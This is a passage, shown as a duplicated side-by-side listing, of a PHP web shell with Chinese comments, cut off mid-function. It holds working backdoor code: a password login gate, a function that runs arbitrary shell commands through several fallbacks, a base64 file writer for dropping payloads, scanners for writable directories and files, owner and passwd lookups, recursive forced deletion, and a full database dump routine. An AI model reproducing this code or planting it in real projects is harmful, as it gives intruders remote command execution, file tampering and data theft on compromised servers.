1641 $from = $pages - $page + 1; 1641 $from = $pages - $page + 1;
1642 } 1642 }
1643 } 1643 }
1644 } 1644 }
1645 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : ''); 1645 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1646 for($i = $from; $i <= $to; $i++) { 1646 for($i = $from; $i <= $to; $i++) {
1647 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> '; 1647 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1648 } 1648 }
1649 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : ''); 1649 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1650 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : ''; 1650 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1651 } 1651 }
1652 return $multipage; 1652 return $multipage;
1653} 1653}
1654// 登陆入口 1654// 登陆入口
1655function loginpage() { 1655function loginpage() {
1656?> 1656?>
1657 <style type="text/css"> 1657 <style type="text/css">
1658 input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;} 1658 input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
1659 </style> 1659 </style>
1660 <form method="POST" action=""> 1660 <form method="POST" action="">
1661 <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20"> 1661 <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
1662 <input type="hidden" name="action" value="login"> 1662 <input type="hidden" name="action" value="login">
1663 <input type="submit" value="Login"> 1663 <input type="submit" value="Login">
1664 </form> 1664 </form>
1665<?php 1665<?php
1666 exit; 1666 exit;
1667}//end loginpage() 1667}//end loginpage()
1668 1668
1669function execute($cfe) { 1669function execute($cfe) {
1670 $res = ''; 1670 $res = '';
1671 if ($cfe) { 1671 if ($cfe) {
1672 if(function_exists('system')) { 1672 if(function_exists('system')) {
1673 @ob_start(); 1673 @ob_start();
1674 @system($cfe); 1674 @system($cfe);
1675 $res = @ob_get_contents(); 1675 $res = @ob_get_contents();
1676 @ob_end_clean(); 1676 @ob_end_clean();
1677 } elseif(function_exists('passthru')) { 1677 } elseif(function_exists('passthru')) {
1678 @ob_start(); 1678 @ob_start();
1679 @passthru($cfe); 1679 @passthru($cfe);
1680 $res = @ob_get_contents(); 1680 $res = @ob_get_contents();
1681 @ob_end_clean(); 1681 @ob_end_clean();
1682 } elseif(function_exists('shell_exec')) { 1682 } elseif(function_exists('shell_exec')) {
1683 $res = @shell_exec($cfe); 1683 $res = @shell_exec($cfe);
1684 } elseif(function_exists('exec')) { 1684 } elseif(function_exists('exec')) {
1685 @exec($cfe,$res); 1685 @exec($cfe,$res);
1686 $res = join("\n",$res); 1686 $res = join("\n",$res);
1687 } elseif(@is_resource($f = @popen($cfe,"r"))) { 1687 } elseif(@is_resource($f = @popen($cfe,"r"))) {
1688 $res = ''; 1688 $res = '';
1689 while(!@feof($f)) { 1689 while(!@feof($f)) {
1690 $res .= @fread($f,1024); 1690 $res .= @fread($f,1024);
1691 } 1691 }
1692 @pclose($f); 1692 @pclose($f);
1693 } 1693 }
1694 } 1694 }
1695 return $res; 1695 return $res;
1696} 1696}
1697function which($pr) { 1697function which($pr) {
1698 $path = execute("which $pr"); 1698 $path = execute("which $pr");
1699 return ($path ? $path : $pr); 1699 return ($path ? $path : $pr);
1700} 1700}
1701 1701
1702function cf($fname,$text){ 1702function cf($fname,$text){
1703 if($fp=@fopen($fname,'w')) { 1703 if($fp=@fopen($fname,'w')) {
1704 @fputs($fp,@base64_decode($text)); 1704 @fputs($fp,@base64_decode($text));
1705 @fclose($fp); 1705 @fclose($fp);
1706 } 1706 }
1707} 1707}
1708function dirsize($dir) { 1708function dirsize($dir) {
1709 $dh = @opendir($dir); 1709 $dh = @opendir($dir);
1710 $size = 0; 1710 $size = 0;
1711 while($file = @readdir($dh)) { 1711 while($file = @readdir($dh)) {
1712 if ($file != '.' && $file != '..') { 1712 if ($file != '.' && $file != '..') {
1713 $path = $dir.'/'.$file; 1713 $path = $dir.'/'.$file;
1714 $size += @is_dir($path) ? dirsize($path) : @filesize($path); 1714 $size += @is_dir($path) ? dirsize($path) : @filesize($path);
1715 } 1715 }
1716 } 1716 }
1717 @closedir($dh); 1717 @closedir($dh);
1718 return $size; 1718 return $size;
1719} 1719}
1720// 页面调试信息 1720// 页面调试信息
1721function debuginfo() { 1721function debuginfo() {
1722 global $starttime; 1722 global $starttime;
1723 $mtime = explode(' ', microtime()); 1723 $mtime = explode(' ', microtime());
1724 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); 1724 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1725 echo 'Processed in '.$totaltime.' second(s)'; 1725 echo 'Processed in '.$totaltime.' second(s)';
1726} 1726}
1727 1727
1728//连接MYSQL数据库 1728//连接MYSQL数据库
1729function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') { 1729function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1730 global $charsetdb; 1730 global $charsetdb;
1731 @ini_set('mysql.connect_timeout', 5); 1731 @ini_set('mysql.connect_timeout', 5);
1732 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) { 1732 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1733 p('<h2>Can not connect to MySQL server</h2>'); 1733 p('<h2>Can not connect to MySQL server</h2>');
1734 exit; 1734 exit;
1735 } 1735 }
1736 if($link && $dbname) { 1736 if($link && $dbname) {
1737 if (!@mysql_select_db($dbname, $link)) { 1737 if (!@mysql_select_db($dbname, $link)) {
1738 p('<h2>Database selected has error</h2>'); 1738 p('<h2>Database selected has error</h2>');
1739 exit; 1739 exit;
1740 } 1740 }
1741 } 1741 }
1742 if($link && mysql_get_server_info() > '4.1') { 1742 if($link && mysql_get_server_info() > '4.1') {
1743 if($charset && in_array(strtolower($charset), $charsetdb)) { 1743 if($charset && in_array(strtolower($charset), $charsetdb)) {
1744 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); 1744 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1745 } 1745 }
1746 } 1746 }
1747 return $link; 1747 return $link;
1748} 1748}
1749 1749
1750// 去掉转义字符 1750// 去掉转义字符
1751function s_array(&$array) { 1751function s_array(&$array) {
1752 if (is_array($array)) { 1752 if (is_array($array)) {
1753 foreach ($array as $k => $v) { 1753 foreach ($array as $k => $v) {
1754 $array[$k] = s_array($v); 1754 $array[$k] = s_array($v);
1755 } 1755 }
1756 } else if (is_string($array)) { 1756 } else if (is_string($array)) {
1757 $array = stripslashes($array); 1757 $array = stripslashes($array);
1758 } 1758 }
1759 return $array; 1759 return $array;
1760} 1760}
1761 1761
1762// 清除HTML代码 1762// 清除HTML代码
1763function html_clean($content) { 1763function html_clean($content) {
1764 $content = htmlspecialchars($content); 1764 $content = htmlspecialchars($content);
1765 $content = str_replace("\n", "<br />", $content); 1765 $content = str_replace("\n", "<br />", $content);
1766 $content = str_replace(" ", "&nbsp;&nbsp;", $content); 1766 $content = str_replace(" ", "&nbsp;&nbsp;", $content);
1767 $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content); 1767 $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
1768 return $content; 1768 return $content;
1769} 1769}
1770 1770
1771// 获取权限 1771// 获取权限
1772function getChmod($filepath){ 1772function getChmod($filepath){
1773 return substr(base_convert(@fileperms($filepath),10,8),-4); 1773 return substr(base_convert(@fileperms($filepath),10,8),-4);
1774} 1774}
1775 1775
1776function getPerms($filepath) { 1776function getPerms($filepath) {
1777 $mode = @fileperms($filepath); 1777 $mode = @fileperms($filepath);
1778 if (($mode & 0xC000) === 0xC000) {$type = 's';} 1778 if (($mode & 0xC000) === 0xC000) {$type = 's';}
1779 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} 1779 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1780 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} 1780 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1781 elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 1781 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1782 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} 1782 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1783 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} 1783 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1784 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} 1784 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1785 else {$type = '?';} 1785 else {$type = '?';}
1786 1786
1787 $owner['read'] = ($mode & 00400) ? 'r' : '-'; 1787 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1788 $owner['write'] = ($mode & 00200) ? 'w' : '-'; 1788 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1789 $owner['execute'] = ($mode & 00100) ? 'x' : '-'; 1789 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1790 $group['read'] = ($mode & 00040) ? 'r' : '-'; 1790 $group['read'] = ($mode & 00040) ? 'r' : '-';
1791 $group['write'] = ($mode & 00020) ? 'w' : '-'; 1791 $group['write'] = ($mode & 00020) ? 'w' : '-';
1792 $group['execute'] = ($mode & 00010) ? 'x' : '-'; 1792 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1793 $world['read'] = ($mode & 00004) ? 'r' : '-'; 1793 $world['read'] = ($mode & 00004) ? 'r' : '-';
1794 $world['write'] = ($mode & 00002) ? 'w' : '-'; 1794 $world['write'] = ($mode & 00002) ? 'w' : '-';
1795 $world['execute'] = ($mode & 00001) ? 'x' : '-'; 1795 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1796 1796
1797 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} 1797 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1798 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} 1798 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1799 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} 1799 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1800 1800
1801 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; 1801 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1802} 1802}
1803 1803
1804function getUser($filepath) { 1804function getUser($filepath) {
1805 if (function_exists('posix_getpwuid')) { 1805 if (function_exists('posix_getpwuid')) {
1806 $array = @posix_getpwuid(@fileowner($filepath)); 1806 $array = @posix_getpwuid(@fileowner($filepath));
1807 if ($array && is_array($array)) { 1807 if ($array && is_array($array)) {
1808 return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>'; 1808 return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1809 } 1809 }
1810 } 1810 }
1811 return ''; 1811 return '';
1812} 1812}
1813 1813
1814// 删除目录 1814// 删除目录
1815function deltree($deldir) { 1815function deltree($deldir) {
1816 $mydir=@dir($deldir); 1816 $mydir=@dir($deldir);
1817 while($file=$mydir->read()) { 1817 while($file=$mydir->read()) {
1818 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 1818 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1819 @chmod($deldir.'/'.$file,0777); 1819 @chmod($deldir.'/'.$file,0777);
1820 deltree($deldir.'/'.$file); 1820 deltree($deldir.'/'.$file);
1821 } 1821 }
1822 if (is_file($deldir.'/'.$file)) { 1822 if (is_file($deldir.'/'.$file)) {
1823 @chmod($deldir.'/'.$file,0777); 1823 @chmod($deldir.'/'.$file,0777);
1824 @unlink($deldir.'/'.$file); 1824 @unlink($deldir.'/'.$file);
1825 } 1825 }
1826 } 1826 }
1827 $mydir->close(); 1827 $mydir->close();
1828 @chmod($deldir,0777); 1828 @chmod($deldir,0777);
1829 return @rmdir($deldir) ? 1 : 0; 1829 return @rmdir($deldir) ? 1 : 0;
1830} 1830}
1831 1831
1832// 表格行间的背景色替换 1832// 表格行间的背景色替换
1833function bg() { 1833function bg() {
1834 global $bgc; 1834 global $bgc;
1835 return ($bgc++%2==0) ? 'alt1' : 'alt2'; 1835 return ($bgc++%2==0) ? 'alt1' : 'alt2';
1836} 1836}
1837 1837
1838// 获取当前的文件系统路径 1838// 获取当前的文件系统路径
1839function getPath($scriptpath, $nowpath) { 1839function getPath($scriptpath, $nowpath) {
1840 if ($nowpath == '.') { 1840 if ($nowpath == '.') {
1841 $nowpath = $scriptpath; 1841 $nowpath = $scriptpath;
1842 } 1842 }
1843 $nowpath = str_replace('\\', '/', $nowpath); 1843 $nowpath = str_replace('\\', '/', $nowpath);
1844 $nowpath = str_replace('//', '/', $nowpath); 1844 $nowpath = str_replace('//', '/', $nowpath);
1845 if (substr($nowpath, -1) != '/') { 1845 if (substr($nowpath, -1) != '/') {
1846 $nowpath = $nowpath.'/'; 1846 $nowpath = $nowpath.'/';
1847 } 1847 }
1848 return $nowpath; 1848 return $nowpath;
1849} 1849}
1850 1850
1851// 获取当前目录的上级目录 1851// 获取当前目录的上级目录
1852function getUpPath($nowpath) { 1852function getUpPath($nowpath) {
1853 $pathdb = explode('/', $nowpath); 1853 $pathdb = explode('/', $nowpath);
1854 $num = count($pathdb); 1854 $num = count($pathdb);
1855 if ($num > 2) { 1855 if ($num > 2) {
1856 unset($pathdb[$num-1],$pathdb[$num-2]); 1856 unset($pathdb[$num-1],$pathdb[$num-2]);
1857 } 1857 }
1858 $uppath = implode('/', $pathdb).'/'; 1858 $uppath = implode('/', $pathdb).'/';
1859 $uppath = str_replace('//', '/', $uppath); 1859 $uppath = str_replace('//', '/', $uppath);
1860 return $uppath; 1860 return $uppath;
1861} 1861}
1862 1862
1863// 检查PHP配置参数 1863// 检查PHP配置参数
1864function getcfg($varname) { 1864function getcfg($varname) {
1865 $result = get_cfg_var($varname); 1865 $result = get_cfg_var($varname);
1866 if ($result == 0) { 1866 if ($result == 0) {
1867 return 'No'; 1867 return 'No';
1868 } elseif ($result == 1) { 1868 } elseif ($result == 1) {
1869 return 'Yes'; 1869 return 'Yes';
1870 } else { 1870 } else {
1871 return $result; 1871 return $result;
1872 } 1872 }
1873} 1873}
1874 1874
1875// 检查函数情况 1875// 检查函数情况
1876function getfun($funName) { 1876function getfun($funName) {
1877 return (false !== function_exists($funName)) ? 'Yes' : 'No'; 1877 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1878} 1878}
1879 1879
1880// 获得文件扩展名 1880// 获得文件扩展名
1881function getext($file) { 1881function getext($file) {
1882 $info = pathinfo($file); 1882 $info = pathinfo($file);
1883 return $info['extension']; 1883 return $info['extension'];
1884} 1884}
1885 1885
1886function GetWDirList($dir){ 1886function GetWDirList($dir){
1887 global $dirdata,$j,$nowpath; 1887 global $dirdata,$j,$nowpath;
1888 !$j && $j=1; 1888 !$j && $j=1;
1889 if ($dh = opendir($dir)) { 1889 if ($dh = opendir($dir)) {
1890 while ($file = readdir($dh)) { 1890 while ($file = readdir($dh)) {
1891 $f=str_replace('//','/',$dir.'/'.$file); 1891 $f=str_replace('//','/',$dir.'/'.$file);
1892 if($file!='.' && $file!='..' && is_dir($f)){ 1892 if($file!='.' && $file!='..' && is_dir($f)){
1893 if (is_writable($f)) { 1893 if (is_writable($f)) {
1894 $dirdata[$j]['filename']=str_replace($nowpath,'',$f); 1894 $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1895 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); 1895 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1896 $dirdata[$j]['dirchmod']=getChmod($f); 1896 $dirdata[$j]['dirchmod']=getChmod($f);
1897 $dirdata[$j]['dirperm']=getPerms($f); 1897 $dirdata[$j]['dirperm']=getPerms($f);
1898 $dirdata[$j]['dirlink']=$dir; 1898 $dirdata[$j]['dirlink']=$dir;
1899 $dirdata[$j]['server_link']=$f; 1899 $dirdata[$j]['server_link']=$f;
1900 $j++; 1900 $j++;
1901 } 1901 }
1902 GetWDirList($f); 1902 GetWDirList($f);
1903 } 1903 }
1904 } 1904 }
1905 closedir($dh); 1905 closedir($dh);
1906 clearstatcache(); 1906 clearstatcache();
1907 return $dirdata; 1907 return $dirdata;
1908 } else { 1908 } else {
1909 return array(); 1909 return array();
1910 } 1910 }
1911} 1911}
1912 1912
1913function GetWFileList($dir){ 1913function GetWFileList($dir){
1914 global $filedata,$j,$nowpath, $writabledb; 1914 global $filedata,$j,$nowpath, $writabledb;
1915 !$j && $j=1; 1915 !$j && $j=1;
1916 if ($dh = opendir($dir)) { 1916 if ($dh = opendir($dir)) {
1917 while ($file = readdir($dh)) { 1917 while ($file = readdir($dh)) {
1918 $ext = getext($file); 1918 $ext = getext($file);
1919 $f=str_replace('//','/',$dir.'/'.$file); 1919 $f=str_replace('//','/',$dir.'/'.$file);
1920 if($file!='.' && $file!='..' && is_dir($f)){ 1920 if($file!='.' && $file!='..' && is_dir($f)){
1921 GetWFileList($f); 1921 GetWFileList($f);
1922 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){ 1922 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1923 if (is_writable($f)) { 1923 if (is_writable($f)) {
1924 $filedata[$j]['filename']=str_replace($nowpath,'',$f); 1924 $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1925 $filedata[$j]['size']=sizecount(@filesize($f)); 1925 $filedata[$j]['size']=sizecount(@filesize($f));
1926 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); 1926 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1927 $filedata[$j]['filechmod']=getChmod($f); 1927 $filedata[$j]['filechmod']=getChmod($f);
1928 $filedata[$j]['fileperm']=getPerms($f); 1928 $filedata[$j]['fileperm']=getPerms($f);
1929 $filedata[$j]['fileowner']=getUser($f); 1929 $filedata[$j]['fileowner']=getUser($f);
1930 $filedata[$j]['dirlink']=$dir; 1930 $filedata[$j]['dirlink']=$dir;
1931 $filedata[$j]['server_link']=$f; 1931 $filedata[$j]['server_link']=$f;
1932 $j++; 1932 $j++;
1933 } 1933 }
1934 } 1934 }
1935 } 1935 }
1936 closedir($dh); 1936 closedir($dh);
1937 clearstatcache(); 1937 clearstatcache();
1938 return $filedata; 1938 return $filedata;
1939 } else { 1939 } else {
1940 return array(); 1940 return array();
1941 } 1941 }
1942} 1942}
1943 1943
1944function GetSFileList($dir, $content, $re = 0) { 1944function GetSFileList($dir, $content, $re = 0) {
1945 global $filedata,$j,$nowpath, $writabledb; 1945 global $filedata,$j,$nowpath, $writabledb;
1946 !$j && $j=1; 1946 !$j && $j=1;
1947 if ($dh = opendir($dir)) { 1947 if ($dh = opendir($dir)) {
1948 while ($file = readdir($dh)) { 1948 while ($file = readdir($dh)) {
1949 $ext = getext($file); 1949 $ext = getext($file);
1950 $f=str_replace('//','/',$dir.'/'.$file); 1950 $f=str_replace('//','/',$dir.'/'.$file);
1951 if($file!='.' && $file!='..' && is_dir($f)){ 1951 if($file!='.' && $file!='..' && is_dir($f)){
1952 GetSFileList($f, $content, $re = 0); 1952 GetSFileList($f, $content, $re = 0);
1953 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){ 1953 } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
1954 $find = 0; 1954 $find = 0;
1955 if ($re) { 1955 if ($re) {
1956 if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){ 1956 if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
1957 $find = 1; 1957 $find = 1;
1958 } 1958 }
1959 } else { 1959 } else {
1960 if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) { 1960 if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
1961 $find = 1; 1961 $find = 1;
1962 } 1962 }
1963 } 1963 }
1964 if ($find) { 1964 if ($find) {
1965 $filedata[$j]['filename']=str_replace($nowpath,'',$f); 1965 $filedata[$j]['filename']=str_replace($nowpath,'',$f);
1966 $filedata[$j]['size']=sizecount(@filesize($f)); 1966 $filedata[$j]['size']=sizecount(@filesize($f));
1967 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); 1967 $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1968 $filedata[$j]['filechmod']=getChmod($f); 1968 $filedata[$j]['filechmod']=getChmod($f);
1969 $filedata[$j]['fileperm']=getPerms($f); 1969 $filedata[$j]['fileperm']=getPerms($f);
1970 $filedata[$j]['fileowner']=getUser($f); 1970 $filedata[$j]['fileowner']=getUser($f);
1971 $filedata[$j]['dirlink']=$dir; 1971 $filedata[$j]['dirlink']=$dir;
1972 $filedata[$j]['server_link']=$f; 1972 $filedata[$j]['server_link']=$f;
1973 $j++; 1973 $j++;
1974 } 1974 }
1975 } 1975 }
1976 } 1976 }
1977 closedir($dh); 1977 closedir($dh);
1978 clearstatcache(); 1978 clearstatcache();
1979 return $filedata; 1979 return $filedata;
1980 } else { 1980 } else {
1981 return array(); 1981 return array();
1982 } 1982 }
1983} 1983}
1984 1984
1985function qy($sql) { 1985function qy($sql) {
1986 global $mysqllink; 1986 global $mysqllink;
1987 //echo $sql.'<br>'; 1987 //echo $sql.'<br>';
1988 $res = $error = ''; 1988 $res = $error = '';
1989 if(!$res = @mysql_query($sql,$mysqllink)) { 1989 if(!$res = @mysql_query($sql,$mysqllink)) {
1990 return 0; 1990 return 0;
1991 } else if(is_resource($res)) { 1991 } else if(is_resource($res)) {
1992 return 1; 1992 return 1;
1993 } else { 1993 } else {
1994 return 2; 1994 return 2;
1995 } 1995 }
1996 return 0; 1996 return 0;
1997} 1997}
1998 1998
1999function q($sql) { 1999function q($sql) {
2000 global $mysqllink; 2000 global $mysqllink;
2001 return @mysql_query($sql,$mysqllink); 2001 return @mysql_query($sql,$mysqllink);
2002} 2002}
2003 2003
2004function fr($qy){ 2004function fr($qy){
2005 mysql_free_result($qy); 2005 mysql_free_result($qy);
2006} 2006}
2007 2007
2008function sizecount($fileSize) { 2008function sizecount($fileSize) {
2009 $size = sprintf("%u", $fileSize); 2009 $size = sprintf("%u", $fileSize);
2010 if($size == 0) { 2010 if($size == 0) {
2011 return '0 Bytes' ; 2011 return '0 Bytes' ;
2012 } 2012 }
2013 $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB'); 2013 $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
2014 return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i]; 2014 return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
2015} 2015}
2016// 备份数据库 2016// 备份数据库
2017function sqldumptable($table, $fp=0) { 2017function sqldumptable($table, $fp=0) {
2018 global $mysqllink; 2018 global $mysqllink;
2019 2019
2020 $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; 2020 $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
2021 $res = q("SHOW CREATE TABLE $table"); 2021 $res = q("SHOW CREATE TABLE $table");
2022 $create = mysql_fetch_row($res); 2022 $create = mysql_fetch_row($res);
2023 $tabledump .= $create[1].";\n\n"; 2023 $tabledump .= $create[1].";\n\n";
2024 2024
2025 if ($fp) { 2025 if ($fp) {
2026 fwrite($fp,$tabledump); 2026 fwrite($fp,$tabledump);
2027 } else { 2027 } else {
2028 echo $tabledump; 2028 echo $tabledump;
2029 } 2029 }
2030 $tabledump = ''; 2030 $tabledump = '';
2031 $rows = q("SELECT * FROM $table"); 2031 $rows = q("SELECT * FROM $table");
2032 while ($row = mysql_fetch_assoc($rows)) { 2032 while ($row = mysql_fetch_assoc($rows)) {
2033 foreach($row as $k=>$v) { 2033 foreach($row as $k=>$v) {
2034 $row[$k] = "'".@mysql_real_escape_string($v)."'"; 2034 $row[$k] = "'".@mysql_real_escape_string($v)."'";
2035 } 2035 }
2036 $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n"; 2036 $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
2037 if ($fp) { 2037 if ($fp) {
2038 fwrite($fp,$tabledump); 2038 fwrite($fp,$tabledump);
2039 } else { 2039 } else {
2040 echo $tabledump; 2040 echo $tabledump;
2041 } 2041 }
2042 } 2042 }
2043 fwrite($fp,"\n\n"); 2043 fwrite($fp,"\n\n");
2044 fr($rows); 2044 fr($rows);
2045} 2045}
2046 2046
2047function p($str){ 2047function p($str){
2048 echo $str."\n"; 2048 echo $str."\n";
2049} 2049}
2050 2050
2051function tbhead() { 2051function tbhead() {
2052 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">'); 2052 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2053} 2053}
2054function tbfoot(){ 2054function tbfoot(){
2055 p('</table>'); 2055 p('</table>');
2056} 2056}
2057 2057
2058function makehide($name,$value=''){ 2058function makehide($name,$value=''){
2059 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />"); 2059 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2060} 2060}
2061 2061
2062function makeinput($arg = array()){ 2062function makeinput($arg = array()){
2063 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; 2063 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2064 $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; 2064 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2065 !$arg['type'] && $arg['type'] = 'text'; 2065 !$arg['type'] && $arg['type'] = 'text';
2066 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : ''; 2066 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2067 $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; 2067 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2068 if ($arg['newline']) { 2068 if ($arg['newline']) {
2069 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>"); 2069 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2070 } else { 2070 } else {
2071 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />"); 2071 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2072 } 2072 }
2073} 2073}
2074 2074
2075function makeselect($arg = array()){ 2075function makeselect($arg = array()){
2076 if ($arg['onchange']) { 2076 if ($arg['onchange']) {
2077 $onchange = 'onchange="'.$arg['onchange'].'"'; 2077 $onchange = 'onchange="'.$arg['onchange'].'"';
2078 } 2078 }
2079 $arg['title'] = $arg['title'] ? $arg['title'] : ''; 2079 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2080 if ($arg['newline']) p('<p>'); 2080 if ($arg['newline']) p('<p>');
2081 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>"); 2081 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2082 if (is_array($arg['option'])) { 2082 if (is_array($arg['option'])) {
